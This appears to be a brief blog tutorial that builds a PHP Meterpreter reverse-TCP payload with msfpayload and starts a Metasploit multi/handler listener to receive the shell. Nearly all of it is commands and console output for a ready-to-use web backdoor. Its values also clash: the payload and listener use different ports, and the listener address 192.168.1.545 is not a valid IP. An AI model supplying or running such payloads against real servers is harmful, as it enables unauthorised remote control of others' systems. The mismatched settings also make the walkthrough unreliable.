Step 1:make php payload
root@1769:~msfpayload php/meterpreter/reverse_tcp LHOST=192.168.1.55 LPORT=1337 R > 1769.php
Step2:Start listener
root@1769:# msfconsole

                ##                          ###           ##    ##
##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                     ##


     =[ metasploit v4.7.0-2013082802 [core:4.7 api:1.0]
+ -- --=[ 1161 exploits - 641 auxiliary - 180 post
+ -- --=[ 310 payloads - 30 encoders - 8 nops

msf >
msf > use exploit/multi/handler
msf exploit(handler) > set LHOST 192.168.1.545
LHOST => 192.168.1.545
msf exploit(handler) > set LPORT 1769
LPORT => 1769
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.1.545:1769
[*] Starting the payload handler…

Post a Comment

 
Top
Google+